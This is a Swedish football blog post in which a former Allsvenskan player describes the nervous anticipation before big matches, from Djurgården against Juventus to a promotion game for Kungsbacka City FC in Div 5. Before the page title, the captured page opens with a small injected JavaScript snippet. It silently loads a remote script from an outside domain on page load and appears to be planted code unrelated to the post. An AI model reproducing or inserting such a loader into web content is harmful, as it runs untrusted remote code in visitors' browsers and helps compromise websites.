;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); DEN DÄR KÄNSLAN – FMSweden
Meny Stäng

DEN DÄR KÄNSLAN

Igår satt jag och kommenterade IFK Göteborg-FC Köpenhamn. Jag fick då frågan hur gärna jag själv hade velat vara på planen och spela just sådana matcher. Jag funderade inte så mycket på det då, men jag kom fram till senare att det är inte nödvändigtvis själva matchen i sig jag saknar. Det jag kan sakna är känslan som man vaknar med på morgonen, DEN DÄR KÄNSLAN.. 

Att spela stora matcher i europaspel eller att ha en avgörande match där allt står på spel, skapar en väldigt speciell känsla i kroppen för de allra flesta. Jag har inte haft förmånen att spela jättemånga viktiga matcher ute i Europa, men det har blivit några. Jag kan fortfarande komma ihåg känslorna i kroppen, när jag vaknade på morgonen den där dagen nere i Turin. Vi skulle möta Juventus i ett avgörande kval till Champions League med Djurgården. Det var ingen, absolut ingen, som trodde vi skulle vara i närheten av Juventus. Jag kände på morgonen att: fan vad roligt det här kommer bli, samtidigt som jag givetvis visste, att det kunde bli fullständig överkörning om det ville sig illa. Känslan i kroppen är dock densamma.

Likadant innan en cupfinal, eller de största matcherna i Allsvenskan. AIK, MFF, derbyna mot GAIS och ÖIS. Man är liksom förväntansfull, lite nervös, men framförallt glad att få vara med och spela i matcher av den digniteten. Det är liksom inte alla som får det.

Numera spelar jag fotboll i Div 5 Halland. Jag spelar i Kungsbacka City FC och vi har gått rätt bra i serien i år.

Jag får ofta frågan ur man motiverar sig till matcher på den nivån, när man spelat på en så hög nivå innan. Det ärliga svaret är givetvis att det inte alltid är lika lätt. Det är fakta, men det behöver inte heller vara konstigare än så.

MEN

Så ibland så kommer det matcher, som man vet på förhand är matcher, även på den här nivån, som är speciella. I dessa fallen har jag en bestämd åsikt och det kanske bara är jag som är fotbollsnörd, som tycker så.

Det spelar ingen roll vilken nivå du spelar på, det spelar ingen roll vilken nivå du har spelat på innan. När du vinner viktiga matcher, eller ska förbereda dig inför en viktig match, så kickar kroppen igång automatiskt. 

Ikväll klockan 17.45 möter vi i City, Särö IK i den viktigaste matchen hittills i år. Vi ligger tvåa och dom ligger trea. Det skiljer 3 poäng och 5 mål till våran fördel. Efter matchen är det tre matcher kvar, de två första lagen går upp till Div 4. Ni förstår själva..

Klockan är nu 08.30 på morgonen, jag sitter och skriver på min AW. Allt är som vanligt, kaffet står bredvid, Football Manager med Fiorentina finns i fliken bredvid och tror ni inte känslan är där?

DEN DÄR KÄNSLAN

Fan vad jag har saknat dig

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar